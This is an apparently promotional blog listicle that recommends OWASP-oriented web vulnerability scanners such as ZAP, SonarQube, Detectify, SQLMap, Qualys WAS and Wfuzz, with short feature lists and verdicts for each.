The Open Source Web Application Security Project (OWASP) is your ultimate place to secure web assets. It offers unbiased information on what vulnerabilities a business should focus on. Over the years, OWASP testing tools have helped save thousands of websites from hackers.
It makes perfect sense to look for a scanner that quickly provides you a list of vulnerabilities on the application based on the OWASP list. This way, you will know which patches to push first and which vulnerabilities can wait without serious business implications.
1. Zed Attack Proxy (ZAP)
Developed by the OWASP community, ZAP testing tool is a perfect place to start if you need something open source. It is compatible over multiple platforms including Windows, Mac, and Linux. Zed Attack Proxy can help you find a majority of vulnerabilities during and after the development stages. However, you will need some tech expertise to understand the results and implement them on your web applications.
- Application error disclosure
- Cookie not HttpOnly flag
- Missing anti-CSRF tokens and security headers
- Private IP disclosure
- Session ID in URL rewrite
- SQL injection
- XSS injection
Our thoughts: This open-source testing tool is apt for businesses with solid tech team and experience with the OWASP list.
Abbey from Mister Scanner is one of the most popular tools for finding vulnerabilities on your website. While it is at par with the testing prowess of ZAP, simple reports make it a perfect choice for small and medium businesses. Mister Scanner can find Cross-site Scripting, SQL Injection, Cross-site Request Forgery and all the other weaknesses on OWASP Top 10. It even comes with recommendations on how to get rid of the security loopholes after the test.
- OWASP Top 10 coverage
- Simple reports
- Useable by non-tech people
- Weekly security updates
- Operated by 130+ ethical hackers
Our thoughts: Pick this scanner if you do not understand where to start with web security. They offer complete guidance.
SonarQube is another powerful, open source testing software with great features. Apart from finding the top 10 issues from the OWASP classification, this tool also exposes the source code quality of any piece of code. SonarQube is written in Java but can test more than 22 programming languages. The online dashboard report makes it easier for the site owners to pick priority issues categorized as Red, Yellow, and Green.
- Cross-site scripting
- Denial of Service (DoS) attacks
- HTTP response splitting
- Memory corruption
- SQL injection
Our thoughts: Just like with ZAP, you will need tech expertise to make sense of the results. However, we recommend this testing tool for source code analysis.
If you are an established business and ready to pay a little extra for security testing, Detectify is your companion. Priced at just $29 (at the time of writing this review), it covers everything you might need from an OWASP testing tool. Detectify is a subscription-based product that periodically scans your web assets for top OWASP issues. It offers a cloud-based platform for reporting and security overview.
- OWASP Top 10 testing
- Cloud-based platform
- Updated CVE library
- Used by top businesses
Our thoughts: While there is a dozen of OWASP testing products, Detectify is highly recommended for its focus on the scanning business.
5. SQL Map
Ideally the list should only have tools that test for OWASP Top 10, SQL Map is an exception. Injection-based security loopholes are a nightmare for most businesses. They lead to data theft, loss of business reputation, and some serious website downtime. SQL Map is a free tool; helping thousands of small businesses deal with the problem. It will help you find six different types of injection-based weaknesses on the application.
- Boolean-based blind
- Stacked queries
- Time-based blind
- UNION query
Our thoughts: Even you have the world’s best OWASP testing product, SQL Map will still add value to your security.
6. Qualys WAS
Qualys Web Application Scanning is a close competitor to Detectify. It is expensive, efficient, and can really make your life easy. Originally developed to test for XSS, SQLi, and CSRF, this testing tool covers hundreds of vulnerabilities including OWASP Top 10 and SANS 25. It is fully cloud-based and deploys in just seconds.
- OWASP Top 10 coverage
- Tests IoT and mobile apps
- Online platform
- Global vulnerability repository
Our thoughts: Qualys is a testing tool for large businesses with huge apps.
The team was divided if Wfuzz should be on the list. It does not cover all the OWASP Top 10 issues but it’s better at one thing- Brute Force Attacks. It is developed in Python and tests you web assets for SQL Injection, XSS Injection and LDAP Injection. However, there is no user interface for Wfuzz and you will need command-line expertise to operate this tool.
- Authentication support
- Cookies fuzzing
- Multiple injection points
- Support for proxy and SOCK
Our thoughts: Wfuzz will help you test for all kinds of injection-based brute force attacks. And it’s free.
Do you know any other OWASP testing tools? Leave them in the comments below with reasons on why we should include them.